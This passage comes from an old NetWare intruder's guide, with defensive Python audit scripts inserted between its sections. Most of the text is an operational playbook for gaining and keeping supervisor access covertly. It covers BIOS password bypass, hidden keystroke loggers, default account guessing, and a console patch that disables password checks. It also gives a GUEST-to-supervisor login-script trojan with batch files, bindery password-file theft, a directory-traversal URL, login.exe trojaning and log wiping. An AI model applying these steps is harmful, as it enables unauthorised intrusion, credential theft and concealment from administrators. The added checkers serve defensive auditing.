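    for task in ("create and write to a file", "see a file name"):
        print(task, "->", missing_rights(task, rights) or "allowed")
```

Passing an Inherited Rights Mask for a directory in `masks` shows at once whether the inherited Create right still reaches it.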
Who is currently logged in
--------------------------
The "userlist" command will reveal all. The command "userlist /a" will list
the ethernet addresses as well.
User Information for Server TEMP
Connection User Name Network Node Address Login Time
---------- -------------- -------- ------------ -------------------
1 SUPERVISOR [ 2] [ 80C7BD547A] 2-12-1997 1:59 pm
2 GUEST [ 2] [ 20E00EB486] 2-12-1997 10:26 am
3 FAXHQ [ 2] [ C06D7C4E] 2-08-1997 3:08 pm
[Snip]
42 PRINTER [ 2] [ C0707C4E] 2-12-1997 1:28 pm
43 BACKUP [ 2] [ 20E00E9B70] 2-12-1997 3:02 pm
44 TEMP [ 2] [ 20E00E3F33] 2-12-1997 2:06 pm
The utility getequiv.exe checks a single user, all members of a group, or all
users on a server, and lists all users who have security equivalences to a
user or group.
Is Accounting Installed
-----------------------
To tell if accounting is installed as any user, load "syscon". Hit return on
"Accounting" and if you get the "Accounting Not Installed", or "Do you wish to
install accounting", then accounting is not installed.
Note that all accounting records are held at sys:\system\net$acct.dat. Access
to this directory is for privileged accounts only.
Has TCP/IP been installed on the network
----------------------------------------
In the sys:etc directory there are several files relating to other systems
that could be connected on the same ethernet. All can be edited with a
standard text editor, if you have sufficient rights, or using the edit NLM
from the console. Note lines with a comment (#) anywhere on the line are
ignored.
SYS:ETC\HOSTS: - maps host names to IP addresses.
Its format is identical to /etc/hosts on UNIX systems. A Hosts file entry has
the following format: IP_address, Host_name, [alias [..]].
#Mappings of host names and host aliases to IP address.
#
130.57.4.2      ta tahiti ta.novell.com loghost
130.57.6.40     osd-frog frog
SYS:ETC\NETWORKS: - maps network names to network addresses.
A Networks file has the following format: network_name, network_number, [alias
[ ...]]
#Network numbers
#
loopback        127             # fictitious internal loopback network
novellnet       130.57          # Novell's network number
SYS:ETC\PROTOCOL: - maps protocol names to IP protocol numbers.
The Protocol file contains information about the known protocols used on the
DARPA Internet network. A Protocol file has the following format :
protocol_name, protocol_number, [alias [..]].
#Internet (IP) protocols
#
ip      0       IP      # internet protocol, pseudo protocol number
icmp    1       ICMP    # internet control message protocol
tcp     6       TCP     # transmission control protocol
udp     17      UDP     # user datagram protocol
SYS:ETC\SERVICES: - maps service names to transport protocol/well-known port
pairs.
# Network service mappings. Maps service names to transport
# protocol and transport protocol ports.
#
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
#
# Host specific functions
#
tftp 69/udp
finger 79/tcp
link 87/tcp ttylink
#
# UNIX specific services these are NOT officially assigned
#
exec 512/tcp
login 513/tcp
shell 514/tcp cmd # no passwords used
printer 515/tcp spooler # experimental
2. NETWARE FOUR
===============
I do not have a netware four right here at the moment, so here is a listing
of commands that will be helpful but no outputs.
nlist server /b - Will provide a list of the bindery servers on your network
and information about the servers.
nlist server - provides a list of servers within the current NDS context.
nlist volume - views the file server volumes defined within the current NDS
context.
nlist /vol - gives more detailed info on the detailed volume.
ndir [path] /do /sub - shows information about the directories in the default
directory.
ndir [path] /a - used to view information about each file in the default
directory.
ndir [path] /r - view information about each file and directory in the default
directory. Shows more detailed info.
nlist user /a - a list of users logged into the current NDS context.
nlist user /b=[server name] - views a list of users defined to the specified
server. This is a recommended command.
rights [path] /t - used to view the trustee list of a file or directory in the
default or pathed directory.
nlist group - view groups within the current NDS context.
nlist organization show "login script" - view the login scripts of
organizations within the current NDS context.
cx /t /all - used to view the NDS tree within the current NDS context.
nlist organization show "detect intruder" - show the detect intruder settings
for the organizations with the current NDS context.
nlist group show "member" - view the groups defined within the current NDS
context and the members of each group.
Is auditing installed
---------------------
There has been a new feature installed with netware 4, the ability for an
auditor to independently supervise the network. Here is a "c" file that
should show if auditing has been installed, as any user. I say should due
to the fact that I do not have the client api's to compile. If anyone does
compile this please send it to me.
/* audit.c - reports whether NDS auditing is enabled on the current context */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <nwnet.h>

void FreeUnicodeTables();
void FreeContext(NWDSContextHandle context);

void main(void)
{
    NWContainerAuditStatus dsStatus;
    NWDSContextHandle      dContext;
    NWCONN_HANDLE          dsconnhandle;
    NWOBJ_ID               containerID;
    NWCCODE                ccode;
    char nameContext[MAX_DN_CHARS + 1] = "";
    int  countrycode, codepage;

    /* the unicode tables must be loaded before any NWDS call */
    countrycode = 001;
#ifdef N_PLAT_UNIX
    codepage = 88591;
#else
    codepage = 437;
#endif
    ccode = NWInitUnicodeTables(countrycode, codepage);
    if (ccode)
    {
        printf("\nNWInitUnicodeTables error\n");
        exit(1);
    }

    /* every error branch below ends in exit(1) through the cleanup helpers */
    dContext = NWDSCreateContext();
    if (dContext == ERR_CONTEXT_CREATION)
    {
        printf("\nNWDSCreateContext error %X\n", dContext);
        FreeUnicodeTables();
    }

    /* name of the current NDS context */
    ccode = NWDSGetContext(dContext, DCK_NAME_CONTEXT, nameContext);
    if (ccode)
    {
        printf("\nNWDSGetContext error %X\n", ccode);
        FreeContext(dContext);
    }

    /* resolve the container to a connection handle and object id */
    ccode = NWDSAuditGetObjectID(dContext, nameContext, &dsconnhandle, &containerID);
    if (ccode)
    {
        printf("\nNWDSAuditGetObjectID error %X for object %s\n", ccode, nameContext);
        FreeContext(dContext);
    }

    /* read the audit status of that container */
    ccode = NWDSGetContainerAuditStats(dsconnhandle, containerID, &dsStatus,
                                       sizeof(dsStatus));
    if (ccode)
    {
        printf("\nNWDSGetContainerAuditStatus error %X\n", ccode);
        FreeContext(dContext);
    }

    printf("Audit is %s on %s.\n",
           (dsStatus.auditingEnableFlag ? "enabled" : "disabled"),
           nameContext);
    FreeContext(dContext);
}

/* release the context, then the unicode tables (which also exits) */
void FreeContext(NWDSContextHandle context)
{
    NWDSFreeContext(context);
    FreeUnicodeTables();
}

/* release the unicode tables and leave the program */
void FreeUnicodeTables()
{
    NWFreeUnicodeTables();
    exit(1);
}
How a Uebercracker gets Supervisor rights and a few tricks
==========================================================
Cracking the bios password
--------------------------
Source: alt.2600 faq
Some BIOS's allow you to require a password be entered before the system
will boot. Some BIOS's allow you to require a password to be entered
before the BIOS setup may be accessed.
The most common BIOS password attack programs are for Ami BIOS. Some
password attack programs will return the AMI BIOS password in plain
text, some will return it in ASCII codes, some will return it in scan
codes. This appears to be dependent not just on the password attacker,
but also on the version of Ami BIOS.
To obtain Ami BIOS password attackers, ftp to ftp.oak.oakland.edu
/simtel/msdos/sysutil/.
If you cannot access the machine after it has been powered up, it is
still possible to get past the password. The password is stored in CMOS
memory that is maintained while the PC is powered off by a small
battery, which is attached to the motherboard. If you remove this
battery, all CMOS information will be lost. You will need to re-enter
the correct CMOS setup information to use the machine. The machine's
owner or user will most likely be alarmed when it is discovered that the
BIOS password has been deleted.
On some motherboards, the battery is soldered to the motherboard, making
it difficult to remove. If this is the case, you have another
alternative. Somewhere on the motherboard you should find a jumper that
will clear the BIOS password. If you have the motherboard
documentation, you will know where that jumper is. If not, the jumper
may be labeled on the motherboard. If you are not fortunate enough for
either of these to be the case, you may be able to guess which jumper is
the correct jumper. This jumper is usually standing alone near the
battery.
Just getting the dos prompt
---------------------------
You might be thinking: what, a dos prompt.... doesn't everyone have one?
Scenario: Machine is booted in the morning with a bios password, logged into the
network and Windows is loaded. But then the ALT+F column is disabled by a
security program. There are no dos-prompt icons, and the only program is
netscape. The standard windows programs are there other than file manager. The
autoexec.bat, config.sys and the network file (called from the autoexec.bat
c:\nwclient\startnet) are read-only.
Solution: One, load netscape and load the General Preferences section. Change
the viewer source to command.com. Next time the view is loaded, say thank you
and there is a dos prompt.
If Netscape was not available, the next section, on the order of execution of
dos files, becomes useful. Place a com in the same directory as startnet.bat. The
com file will execute before the batch file to load any program you wish
before the computer logs into the network. One possibility would be a key stroke
logger to catch the password.
But how do you place the com in c:\nwclient when there is no dos prompt or file
manager? Use write.exe (if you didn't have netscape) to open the com file from
drive a: and save it in the same directory as startnet.bat. Note only write.exe,
not notepad.exe, has the ability to save com files. In one swoop you have a
dos-prompt and the network password, without the knowledge of the administrator.
The Execution Order of Dos Files
--------------------------------
Remember the execution order of dos files:
1. COM
2. EXE
3. BAT
If you remember this, and if the full name of the file, i.e.
c:\nwclient\startnet.bat, is not stated, a replacement com or exe file can be
installed.
To be a little smarter, few people have rights to novell operating system
files but usually to spreadsheet or wordprocessor programs. Another useful
idea is in regard to modem programs. Most netware lans have modem programs
loaded onto them. A simple trap would be to hide a com file, which would load
before the exe. Load a keystroke trapper, and capture all passwords, etc etc
that are passed over the modem. If the com file was hidden, and was used
only on a temporary basis, this could prove effective, depending on the skill
of your administrator.
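Because of the COM, EXE, BAT order, an administrator can find planted files by listing every command name that exists with more than one of those extensions in the same directory, and comparing the result with a known-good listing. The check below is an added example, not part of the original article; the function names and both file listings are constructed for the demonstration.

```python
import ntpath
import os
from collections import defaultdict

# DOS tries these extensions in this order when a command is typed without one.
PRECEDENCE = (".COM", ".EXE", ".BAT")


def find_shadowed(paths):
    """Return one finding per command name that exists with several extensions
    in the same directory; 'runs' is the file DOS would actually start."""
    by_command = defaultdict(dict)
    for path in paths:
        directory, name = ntpath.split(path)
        stem, ext = ntpath.splitext(name)
        if ext.upper() in PRECEDENCE:
            by_command[(directory.upper(), stem.upper())][ext.upper()] = path
    findings = []
    for (directory, stem), found in sorted(by_command.items()):
        present = [ext for ext in PRECEDENCE if ext in found]
        if len(present) > 1:
            findings.append({
                "directory": directory,
                "command": stem,
                "runs": found[present[0]],
                "shadowed": [found[ext] for ext in present[1:]],
            })
    return findings


def new_shadows(baseline_paths, current_paths):
    """Findings present now that were not in the known-good baseline."""
    def key(finding):
        return (finding["directory"], finding["command"], finding["runs"].upper())
    known = {key(f) for f in find_shadowed(baseline_paths)}
    return [f for f in find_shadowed(current_paths) if key(f) not in known]


def list_tree(root):
    """Collect file paths under root, e.g. a mounted copy of a workstation disk."""
    return [os.path.join(folder, name)
            for folder, _dirs, files in os.walk(root) for name in files]


# Constructed listings: a known-good baseline and a later listing of the same PC.
BASELINE = [
    r"C:\NWCLIENT\STARTNET.BAT", r"C:\NWCLIENT\LSL.COM",
    r"C:\NWCLIENT\NE2000.COM", r"C:\NWCLIENT\IPXODI.COM",
    r"C:\NWCLIENT\NETX.EXE",
    r"C:\APPS\MENU.EXE", r"C:\APPS\MENU.BAT",   # pre-existing, accepted pair
]
CURRENT = BASELINE + [r"C:\NWCLIENT\startnet.com"]

if __name__ == "__main__":
    for finding in new_shadows(BASELINE, CURRENT):
        print("NEW:", finding["runs"], "now runs instead of",
              ", ".join(finding["shadowed"]))
```

Calling batch files by their full name, as in `c:\nwclient\startnet.bat`, removes the ambiguity this check looks for.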
Finding valid accounts and passwords
------------------------------------
To crack a novell network first of all you need an account. Trying the default
supervisor and guest, would be the first place to start. Often the guest
account will have no password. Beware of intruder detection. Others you might
like to try include:
Backup
Fax
Faxuser
Faxworks
Faxhq
Hplaser
Laser
Laserwriter
Post
Print
Printer
Router
Student
Temp
Test
Wangtek
Login security in layman's terms consists of the following four steps:
1. The user logs into the network by specifying the file server name and
username. The system verifies the username by matching it against an object in
the NET$OBJ.SYS bindery file. Whether or not the username exists, Netware
prompts for a password.
2. If the system verifies the username, it searches the NET$PROP.SYS file for
a password property. If one exists, it responds with Password: If a password
doesn't exist, the system jumps to step 4.
3. The user enters a password. If the username is valid, Netware compares this
input to the value in NET$VAL.SYS (This database actually holds the encrypted
passwords). If the username is not valid, the system bypasses the search and
responds with Access Denied.
4. If the user enters the correct password for this username, they will be
granted conditional access to the LAN. If not the system responds with access
denied. Next the system matches the username with a variety of additional
bindery values.
Therefore you should notice that invalid usernames respond much more quickly
with access denied, as netware doesn't search the bindery for invalid username
passwords.
Another way is to use the utility doskey. As most people will know doskey
keeps your previous commands in memory. A simple F7 will often reveal a lot.
Note if you do not wish anyone to follow your tracks, ALT+F7 will clear the
memory.
Install KeyStroke Trapper
-------------------------
Installing a keystroke logger is one of the most deadly hacking methods on IBM
pc's. By looking at a config.sys and autoexec.bat, and the general layout of a
pc, you can usually tell how advanced the user is. For example, lots of temp
files in the root directory and little organisation of the startup files
usually indicates the user would not notice if one line was temporarily
added to the autoexec.bat.
Either way copy the keylogging program to the c:\dos directory. Rename it to
something like doskey or mouse or some other tsr, copy the old file to *.old
and hide it through "attrib +h", or remove it totally.
Changing the date of the keylogging program and autoexec.bat to the original
could also be options if needed.
Brute Force Password Cracking
-----------------------------
While I find this option is for the desperate, it is still an option. The
program nwpcrack.exe will take a dictionary and then attempt to guess a user's
password. Notice this could alert the administrator of your hacking presence
if intruder detection is installed. Also if intruder detection is installed,
this program will keep trying passwords even if the account has been locked.
How to remove password validation
---------------------------------
To disable password verification at the console:
"left-shift""right-shift""alt""esc" To enter debugger
type "c VerifyPassword=B8 0 0 0 0 C3"
type "g"
To restore password verification:
type "d VerifyPassword 5" and write down the 5 byte response
type "c VerifyPassword=xx xx xx xx xx"
type "g"
Ethernet address spoofing with ODI
----------------------------------
Source : Edited heavily from Phrack ?? by Otaku
Login as GUEST or a normal account. Try to see who else is on the system.
USERLIST /A >c:\ulist.txt will give you a list of users currently logged in,
with their Ethernet card addresses saved to a text file . Your current
connection will be marked with an asterisk.
The security aware Novell supervisors will have set up Backup accounts with an
extra level of security which restricts logins to only those Ethernet
addresses which have been specified. The really sensible ones will have made
sure that any such machines are sited in physically secure areas, as well.
Although this is a very good idea, from the security point of view, Novell
have now provided a mechanism which allows you to get around this: the
replacement for monolithic IPX/NETX called Open Datalink Interface (ODI).
Novell's ODI, and its slower Microsoft equivalent Network Driver Interface
Specification (NDIS), both work by putting a common layer of software between
the hardware of the Network Interface Card and the rest of the MSDOS
Redirector. This allows multiple protocol stacks and frame types to be bound
to the same physical card e.g.
IPX TCP/IP NETBeui DECnet Appletalk
Link Support Layer
Hardware Specific device driver e.g. NE2000
Under ODI, to load your drivers to enter the network:
LSL
NE2000
IPXODI
NETX
With ODI, there are more parameters for NET.CFG but the worrying/interesting
one is the ability to specify a different MAC level address to that of your
actual Ethernet card. It needs this ability to cope with TCP/IP or DECnet
coexistence e.g.
BUFFERS 100
MACHINE TYPE COMPAQ
PREFERRED SERVER FINANCE
NODE ADDRESS AA-00-04-00-12-34
Since this DECnet address does not depend on the "real" unique Ethernet
address which has been burnt into the PROM on the card and is centrally
registered, this mechanism allows you to put a different Ethernet card address
into NET.CFG, thereby fooling the Address Restriction security.
e.g. NODE ADDRESS 02-60-80-12-34-56
This is where the data you gathered earlier with USERLIST and SYSCON becomes
threatening/useful.
Of course, if your target PC is on a different LAN segment, there may be
Routers or intelligent hubs which restrict your ability to do this, or at
least record attempts in log files which can trace your activity, provided
that suspicions are aroused before they are periodically wiped out.
If you set this connection parameter to be the same as that of another PC, the
fileserver (Novell, DEC or UNIX) and the Ethernet have no way of preventing
some packets intended for just one unique address going to the other, if they
are both online at the same time. This usually results in PC hangs, incomplete
closure of files, File Allocation Table problems.
If by accident or design, you set your PC to have the same address as the
fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the
whole network segment.
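A node address set in NET.CFG shows up in "userlist /a" like any other, so the same listing lets an administrator look for the two signs described above: an address with the locally administered bit set (as in both NODE ADDRESS examples) and one address in use by more than one account. The parser below is an added example, not part of the original article. The listing is constructed in the column layout shown earlier, the position of the asterisk is an assumption, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# connection number, optional '*' for the current connection, user name,
# then network and node address in square brackets
ROW = re.compile(
    r"^\s*(\d+)\s+(\*\s*)?(\S+)\s+\[\s*([0-9A-F]+)\s*\]\s+\[\s*([0-9A-F]+)\s*\]",
    re.I)

LOCAL = "locally administered address"
SHARED = "address shared with another user"


def parse_userlist(text):
    """Parse 'userlist /a' output; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        match = ROW.match(line)
        if match:
            rows.append({
                "conn": int(match.group(1)),
                "user": match.group(3).upper(),
                # userlist drops leading zeros, so pad back to full width
                "network": match.group(4).upper().zfill(8),
                "node": match.group(5).upper().zfill(12),
            })
    return rows


def locally_administered(node):
    """True when bit 1 of the first octet is set, i.e. the address was
    assigned in software rather than taken from the card's PROM."""
    return bool(int(node[:2], 16) & 0x02)


def audit_stations(rows):
    """Return (connection, user, node, reason) tuples worth a second look.
    DECnet hosts legitimately use locally administered addresses, so the
    findings are leads for review, not proof of spoofing."""
    users_at = defaultdict(set)
    for row in rows:
        users_at[(row["network"], row["node"])].add(row["user"])
    findings = []
    for row in rows:
        if locally_administered(row["node"]):
            findings.append((row["conn"], row["user"], row["node"], LOCAL))
        if len(users_at[(row["network"], row["node"])]) > 1:
            findings.append((row["conn"], row["user"], row["node"], SHARED))
    return findings


# Constructed listing for the demonstration.
USERLIST_A = """\
User Information for Server TEMP
Connection  User Name      Network   Node Address   Login Time
----------  -------------- --------  ------------   -------------------
     1      SUPERVISOR     [      2] [  80C7BD547A]  2-12-1997  1:59 pm
     2      GUEST          [      2] [  20E00EB486]  2-12-1997 10:26 am
     3      FAXHQ          [      2] [    C06D7C4E]  2-08-1997  3:08 pm
     4      BACKUP         [      2] [  20E00EB486]  2-12-1997  3:02 pm
     5    * TEMP           [      2] [ 26080123456]  2-12-1997  2:06 pm
"""

if __name__ == "__main__":
    for conn, user, node, reason in audit_stations(parse_userlist(USERLIST_A)):
        print(f"connection {conn} ({user}) at {node}: {reason}")
```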
Checking your rights in Certain Directories
-------------------------------------------
As previously stated, use "whoami /a" to list the groups you belong to,
security equivalences, and your effective rights.
The sys:system directory
If you have rights to f:\system, try to grab the rconsole password in the
autoexec.ncf, or the bindery files in the same directory. Note these are
hidden files *.sys. To view them use "ndir /h", which lists all hidden files.
The sys:login directory
If you have access to this directory, well ....
Abusing the Mail Directory Rights
---------------------------------
Most of this attack is taken from the Netware Hack FAQ.
In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means
the user (including GUEST) has the ability to write files to any
subdirectory in SYS:MAIL. The first versions of Netware included a simple
e-mail package, and every user that is created gets a subdirectory in
mail with RCWEMF, named after their object ID number. One consistent
number is the number 1, which is always assigned to Supervisor. Here's
one way to exploit it:
- Login as GUEST and change to the SYS:MAIL subdirectory.
- Type DIR. You will see one subdirectory, the one owned by GUEST. Change
into that directory (ex. here is C0003043)
- Type DIR. If there is no file named LOGIN, you can bet there may not be
one for Supervisor. If there is a default-looking LOGIN file, even a zero
length file, you cannot proceed.
- Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043
- Create a batch file (ex. here is BOMB.BAT) with the following entries:
@ECHO OFF
FLAG \LOGIN\LOGIN.EXE N > NUL
COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
FLAG \LOGIN\LOGIN.EXE SRO > NUL
\MAIL\C0003043\PROP -C > NUL
- Create a LOGIN file with the following entries:
MAP DISPLAY OFF
MAP ERRORS OFF
MAP G:=SYS:
DRIVE G:
COMMAND /C #\MAIL\1\BOMB
DRIVE F:
MAP DELETE G:
- Now copy the files to the Supervisor's SYS:MAIL directory from a drive
mapped to the SYS: volume.
TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
TYPE LOGIN > \MAIL\1\LOGIN
- The next time the Supervisor logs in the LOGIN.EXE is replaced and the
PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the
passwords, and then once you have all the passwords you need (including
Supervisor) delete your LOGIN and BOMB.BAT file.
Admins can defeat this by creating default personal Login Scripts or by
adding an EXIT command to the end of the System Login Script. Later versions
of Netware create a zero-length LOGIN file at ID creation time in the
SYS:MAIL directories to defeat this.
Strolling over to the Console
-----------------------------
If the monitor has not been assigned a password, usually "secure console"
would not be loaded. Secure console stops nlms from being loaded from drive a:
or any other directory than sys:system. If a password has been assigned, ops
reboot the server and there will not be a password.
To add a user from the console use burglar.nlm. This will create a super-user
of your choice. To change any users password use setpwd.nlm.
Hack.exe ... no Packet Signatures
---------------------------------
If you are on a 3.1x network and no packet signatures are loaded, you can
easily become supervisor. The only problem is that all users will become
supervisors.
Attacking the Console through Rconsole
--------------------------------------
1. Login as guest, or any user and check if accounting is installed.
2. Load rconsole, sometimes this requires supervisor rights depending on the
version of rconsole you are using.
3. Attempt the password, remote, /p= or /s= are often used. It should be noted
that if you can capture an rconsole session with an ethernet analyser, the
rconsole password can be extracted. Refer to rconfaq.zip below.
4. Once you have the correct password, type "modules", and view what is
loaded. If conlog.nlm is loaded unload it. Get a feel for what is loaded, type
"config" this will tell you what protocols are loaded.
5. Load burglar.nlm or setpwd.nlm, to create a new user or change the password
of another.
6. If conlog was not loaded, "load delay 30 cls", therefore when you exit
rconsole no tracks will be left behind.
7. Exit rconsole, login and do what you will.
8. Clean the logs, sys:system\sys$log.err, delete and purge any nlms loaded.
9. If conlog was loaded, enter rconsole and downing the server is an option to
clear the log file.
Cracking the Bindery Files
--------------------------
FS3/SYS:SYSTEM
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
NET$OBJ SYS 7,360 2-09-96 11:30p [Rw-A-HSy-T--------] SUPERVISOR
NET$PROP SYS 25,364 2-09-96 11:30p [Rw-A-HSy-T--------] SUPERVISOR
NET$VAL SYS 108,914 2-12-96 10:23a [Rw-A-HSy-T--------] SUPERVISOR
These are the bindery files for novell netware and, despite somewhat unpopular
belief, it is possible to crack passwords unix style by obtaining the password
files. To close and copy the bindery files, create the following batch file:
@echo off
bindclos
cd\system
flag net$obj.sys -hsyt
flag net$prop.sys -hsyt
flag net$val.sys -hsyt
copy net$obj.sys a:\
copy net$prop.sys a:\
copy net$val.sys a:\
flag net$obj.sys +hsyt
flag net$prop.sys +hsyt
flag net$val.sys +hsyt
bindopen
Note that bindclos and bindopen are part of the jrbutils. Also opening and
closing the bindery will create messages in the log file sys:system.
The problem here is that the sys:system directory is restricted.
Syscon - Clear text passwords
-----------------------------
Older versions of SYSCON like the one shipped with NetWare 3.11 - version
3.62, I believe - encrypt the passwords so they are not in clear text across
the network. The version that ships with NetWare 3.12 (3.75) certainly does
not encrypt the passwords, therefore passwords can be captured by ethernet
sniffers.
Pmail
-----
--- From a local source ---
Subject: Re: students breaking into network through pmail
I would recommend creating a rules.pmq file in all users mail
directories to prevent this. Even if a user doesn't have supervisor
rights, you could have the program do a number of things. If nothing
else, they could have the user delete all the mail files.
The easiest way that I could think of doing this would be to create
a rules.pmq file and then copying it into each users mail directory.
This could be done by creating a dummy rules.pmq file, and use
a program like pcmag's sweep program.
F:\MAIL>sweep if not exist rules.pmq copy \mail\1\rules.pmq
I don't know if creating a zero byte rules.pmq would work with pegasus. It
might not like a zero byte file, and you can copy a zero byte file.
Perhaps it would be best to have Pegasus mail create an empty rules
file if one doesn't exist to prevent this. That would be the easiest
thing to totally solve the problem.
> I have recently caught a student using the following procedure
>
> create a rules.pmq in their own account that sets up a rule to execute
> a program on receipt of any mail. the program run line is
>
> COMMAND /C H:\MAIL\target users mail dir\gotya.bat
>
> they then copy this rules.pmq into a users mail directory (ONLY WORKS IF
> USER DOES NOT HAVE A RULES.PMQ ALREADY) they then create a gotya.bat in
> the target users mail directory to do anything they want.
>
> I tested and was able using the guest account which has C rights in the
> mail dir to copy John Baird's (JRB UTILS) SETEQUIV into a supervisor
> equiv's mail directory plus a batch file that when run would change
> guest to be a supervisor equivalent. Copied a rules.pmq to run this
> batch file. then delete all related files.
>
> When the super equiv read their mail (as I watched!) the screen went
> black as the rules were processed and then carried on. No indication of
> what had been done to the super user but guest had super rights.
>
> has any one else tried this or seen this? The only way to stop this was
> to copy an empty RULES.PMQ into each users mail dir.
>
--- End excerpt ---
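Both the SYS:MAIL login script problem and the Pegasus rules problem come down to a file missing from a directory where other accounts can create files, and both fixes quoted above are a placeholder file. The audit below walks a mail root and reports directories that lack LOGIN or RULES.PMQ, hold executables or batch files, or have a LOGIN script that refers to a path under \MAIL\. It is an added example, not part of the original article or the quoted message; the function names are hypothetical and the directory tree is constructed.

```python
import os

EXECUTABLE_EXTS = {".BAT", ".COM", ".EXE"}
PLACEHOLDERS = ("LOGIN", "RULES.PMQ")


def audit_mail_dir(user_dir):
    """Return a list of (issue, detail) tuples for one user's mail directory."""
    issues = []
    names = {name.upper(): name for name in os.listdir(user_dir)}
    # A missing placeholder means any account with Create here can supply one.
    for wanted in PLACEHOLDERS:
        if wanted not in names:
            issues.append(("missing", wanted))
    # Mail directories have no reason to hold programs or batch files.
    for upper, real in sorted(names.items()):
        if os.path.splitext(upper)[1] in EXECUTABLE_EXTS:
            issues.append(("executable", real))
    # A personal login script that points back into \MAIL\ deserves a review.
    login = names.get("LOGIN")
    if login and os.path.isfile(os.path.join(user_dir, login)):
        with open(os.path.join(user_dir, login), errors="replace") as handle:
            for number, line in enumerate(handle, 1):
                if "\\MAIL\\" in line.upper():
                    issues.append(("login-references-mail", f"line {number}"))
    return issues


def audit_mail_root(mail_root):
    """Audit every subdirectory of mail_root; clean directories are omitted."""
    report = {}
    for entry in sorted(os.listdir(mail_root)):
        path = os.path.join(mail_root, entry)
        if os.path.isdir(path):
            issues = audit_mail_dir(path)
            if issues:
                report[entry] = issues
    return report


def make_constructed_tree(root):
    """Build a small sample tree (constructed data) so the audit can be tried."""
    layout = {
        "1": {"LOGIN": "MAP DISPLAY OFF\nCOMMAND /C #\\MAIL\\1\\BOMB\n",
              "BOMB.BAT": "@ECHO OFF\n"},
        "C0003043": {"LOGIN": "", "RULES.PMQ": ""},   # both placeholders present
        "2000A": {},                                  # nothing created yet
    }
    for directory, files in layout.items():
        os.makedirs(os.path.join(root, directory))
        for name, content in files.items():
            with open(os.path.join(root, directory, name), "w") as handle:
                handle.write(content)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as sample_root:
        make_constructed_tree(sample_root)
        for directory, issues in audit_mail_root(sample_root).items():
            for issue, detail in issues:
                print(f"{directory}: {issue} ({detail})")
```

Run it against the drive letter mapped to SYS:MAIL; directories that report nothing already carry both placeholders.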
Problems with the netware http
------------------------------
Subject: *** SECURITY ALERT ***
I spent some time exploring Novell's HTTP server and out of the box
there is a CGI that is VERY VERY INSECURE!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
If you are running the Novell HTTP server, please disable the CGI's
it comes with until you understand (fully understand) what the
security risks are.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
The CGI in question is convert.bas (yes, cgi's in basic, stop laughing).
(There may be more CGI's in the scripts dir that can be exploited
but this was all I could stomach.)
A remote user can read any file on the remote file system using
this CGI. This means that if you are running the Novell HTTP
server and have the 'out of box' CGI's, you are breached.
Exploit code:
http://victim.com/scripts/convert.bas?../../anything/you/want/to/view
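The alert above describes a script that appends the query string to a base directory without checking where the result points. The source of convert.bas is not shown in the article, so the sketch below is an added example with hypothetical names (`naive_resolve`, `safe_resolve`, `DOC_ROOT`): it places that behaviour next to a resolver that decodes the request, normalises it and refuses anything outside the document root.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/web/docs"  # hypothetical document root for the demonstration


def naive_resolve(root, requested):
    """What a script does when it joins the query string onto a base path."""
    return posixpath.normpath(posixpath.join(root, requested))


def safe_resolve(root, requested):
    """Return the path under root that the request names, or raise ValueError."""
    decoded = requested
    for _ in range(4):                       # peel nested percent-encoding
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    else:
        raise ValueError("too many layers of percent-encoding")
    if "\x00" in decoded or ":" in decoded:
        raise ValueError("NUL byte or volume/drive prefix in path")
    # Treat both separators alike and never let the request restart at '/'.
    decoded = decoded.replace("\\", "/").lstrip("/")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Compare against root + '/' so '/web/docs-private' does not pass as
    # a child of '/web/docs'.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("request escapes the document root")
    # On a real file system, resolve symbolic links before this comparison.
    return candidate


def is_rejected(root, requested):
    """Convenience wrapper: True when safe_resolve refuses the request."""
    try:
        safe_resolve(root, requested)
    except ValueError:
        return True
    return False


# Constructed requests; the first is the pattern quoted in the alert.
REQUESTS = [
    "../../anything/you/want/to/view",
    "%2e%2e/%2e%2e/x",
    "%252e%252e/x",
    "..\\..\\x",
    "SYS:ETC/HOSTS",
    "../docs-private/x",
    "guide/intro.txt",
]

if __name__ == "__main__":
    for request in REQUESTS:
        verdict = "rejected" if is_rejected(DOC_ROOT, request) else "served"
        print(f"{request!r}: naive -> {naive_resolve(DOC_ROOT, request)}, "
              f"checked -> {verdict}")
```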
How a Uebercracker keeps his rights
===================================
Trojaning the Netware Login Process
-----------------------------------
If you have attained supervisor status, it is relatively easy to trojan the
login process to reveal all users' passwords to any user. This is done through
the utilisation of two utilities written by itsme.
Firstly a replacement login.exe and prop.exe to create a property in the
bindery to hold the clear passwords. Here is the process:
1. Note the original login.exe's file dates and owner.
2. Copy the trojaned login.exe to the sys:login directory, and use filer to
change file's date's and owner to that of the original login.exe.
3. Flag the trojaned login.exe "ros" through flag login.exe +sro.
4. Run "prop -c" to create the new property from a floppy disk.
5. Purge the original login.exe
6. At any time with any rights "prop -r" will retrieve a list of users and
passwords.
Super.exe
---------
Allows a user to switch supervisor equivalence on and off. The user must
already be supervisor equivalent the first time it is used. Super changes the
user's bindery entry under NW 2.X and 3.1X up to 3.11 to allow it to toggle
supervisor equivalence. Under 3.12, Novell prevented this modification so
instead Super makes the user a manager of both supervisor and his/her own
usercode.
Where are those error logs and what do they log ?
-------------------------------------------------
Part of this is taken from Edinburg Tech Library
FS3/SYS:SYSTEM
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
